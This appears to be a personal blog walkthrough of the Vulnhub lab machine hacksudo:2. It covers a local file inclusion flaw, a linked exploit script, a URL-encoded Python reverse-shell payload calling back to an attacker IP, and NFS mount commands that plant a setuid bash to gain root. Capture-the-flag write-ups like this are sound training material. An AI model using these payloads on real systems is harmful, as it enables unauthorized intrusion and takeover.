Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub hacksudo:2 Walkthrough

https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/


Scan ports.

图片.png


Scan port 80.

图片.png


Info.php is phpinfo, file.php has LFI vunerability.

图片.png


Use pwn code to get a cmd shell.

https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py

Check if the shell is OK.

图片.png 


Then visit http://192.168.56.93/file.php?file=/tmp/f&1=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27, get an interactive reverse shell.

图片.png


OK, there is another way to get user shell. ( Sometimes the exp.py did not work.)

First mount, then copy reverse.php to /mnt/nfs, and visit it use file.php?file=/mnt/nfs/reverse.php.

图片.png


Since nfs is available, and misconfiged, we can get root through nfs.

At attack's machine, run following cmds:

showmount -e 192.168.56.93
sudo mount -t nfs 192.168.56.93:/mnt/nfs /mnt
cd /mnt
sudo cp /bin/bash ./ sudo chmod +s ./bash


Then reverse shell, we can get root.

图片.png


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0